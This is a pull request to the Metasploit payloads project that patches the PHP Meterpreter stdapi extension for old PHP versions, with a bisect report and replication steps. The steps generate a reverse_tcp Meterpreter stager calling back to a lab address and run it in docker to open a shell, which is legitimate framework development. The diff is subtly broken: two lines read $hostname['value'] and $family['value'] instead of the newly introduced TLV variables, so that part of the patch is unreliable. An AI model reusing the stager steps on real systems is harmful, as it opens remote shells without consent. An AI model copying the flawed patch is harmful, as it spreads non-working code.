### PR TITLE
Fix Meterpreter's stdapi for php 5.3

### DIFF
--- a/php/meterpreter/ext_server_stdapi.php
+++ b/php/meterpreter/ext_server_stdapi.php
@@ -452,7 +452,8 @@ function resolve_host($hostname, $family) {
     } elseif ($family == AF_INET6) {
         $dns_family = DNS_AAAA;
     } else {
-        throw new Exception('invalid family, must be AF_INET or AF_INET6');
+        my_print('invalid family, must be AF_INET or AF_INET6');
+        return ERROR_FAILURE;
     }
 
     $dns = dns_get_record($hostname, $dns_family);
@@ -1204,15 +1205,18 @@ if (!function_exists('stdapi_net_resolve_host')) {
 register_command('stdapi_net_resolve_host', COMMAND_ID_STDAPI_NET_RESOLVE_HOST);
 function stdapi_net_resolve_host($req, &$pkt) {
     my_print("doing stdapi_net_resolve_host");
-    $hostname = packet_get_tlv($req, TLV_TYPE_HOST_NAME)['value'];
-    $family = packet_get_tlv($req, TLV_TYPE_ADDR_TYPE)['value'];
+    $hostname_tlv = packet_get_tlv($req, TLV_TYPE_HOST_NAME);
+    $hostname = $hostname['value'];
+    $family_tlv = packet_get_tlv($req, TLV_TYPE_ADDR_TYPE);
+    $family = $family['value'];
 
     if ($family == WIN_AF_INET) {
         $family = AF_INET;
     } elseif ($family == WIN_AF_INET6) {
         $family = AF_INET6;
     } else {
-        throw new Exception('invalid family');
+        my_print('invalid family, must be AF_INET or AF_INET6');
+        return ERROR_FAILURE;
     }
 
     $ret = ERROR_FAILURE;
@@ -1230,14 +1234,16 @@ if (!function_exists('stdapi_net_resolve_hosts')) {
 register_command('stdapi_net_resolve_hosts', COMMAND_ID_STDAPI_NET_RESOLVE_HOSTS);
 function stdapi_net_resolve_hosts($req, &$pkt) {
     my_print("doing stdapi_net_resolve_hosts");
-    $family = packet_get_tlv($req, TLV_TYPE_ADDR_TYPE)['value'];
+    $family_tlv = packet_get_tlv($req, TLV_TYPE_ADDR_TYPE);
+    $family = $family_tlv['value'];
 
     if ($family == WIN_AF_INET) {
         $family = AF_INET;
     } elseif ($family == WIN_AF_INET6) {
         $family = AF_INET6;
     } else {
-        throw new Exception('invalid family');
+        my_print('invalid family, must be AF_INET or AF_INET6');
+        return ERROR_FAILURE;
     }
 
     $hostname_tlvs = packet_get_all_tlvs($req, TLV_TYPE_HOST_NAME);


### PR DESCRIPTION
### Context

This PR fixes an issue raised by @mubix on the Metasploit slack channel against Task 11 here: https://tryhackme.com/room/adventofcyber3.


I did a quick bisect, and it looked like the issue was introduced by:
Framework bump: https://github.com/rapid7/metasploit-framework/pull/15035

The commit before that PR works fine, and stdapi loads as expected:
```
git checkout bd6c211723f632efeb70b75d02e1e72c74719ceb~1
```

Whilst the PHP 8 upgrade commit breaks, and stdapi fails:
```
git checkout bd6c211723f632efeb70b75d02e1e72c74719ceb
```

The tryhackme room was using an old PHP version:
```
DISTRIB_DESCRIPTION="Ubuntu 12.04.5 LTS"
PHP 5.2.17 (cli)
```

### Replicating

Generate stager and handler:
```
use php/meterpreter/reverse_tcp
generate lhost=192.168.123.1 -f raw -o stager.php
to_handler
```

Trigger shell from docker:
```
 docker run -p 8001:80 -w /var/www/html -v $(pwd):/var/www/html --rm -it luismesalas/php-5.2-apache /bin/bash --login -c "/usr/bin/php52/php ./stager.php"
```

### Fix

Looks like the issue was introduced by https://github.com/rapid7/metasploit-payloads/pull/482 and that PHP 5.3 and below doesn't support this syntax:
```
echo get_packet()["value"];
```

Full example on https://sandbox.onlinephpfunctions.com/

```
<?php

function get_packet() {
  return array("value" => "hello world");
}

echo get_packet()["value"];
```

With 5.4:
```
hello world
```

With 5.3.29
```
<br />
<b>Parse error</b>:  syntax error, unexpected '[', expecting ',' or ';' in <b>[...][...]</b> on line <b>7</b><br />
```

![image](https://user-images.githubusercontent.com/60357436/144939251-f828173b-4f7d-488b-b3ed-9a07dce0d100.png)
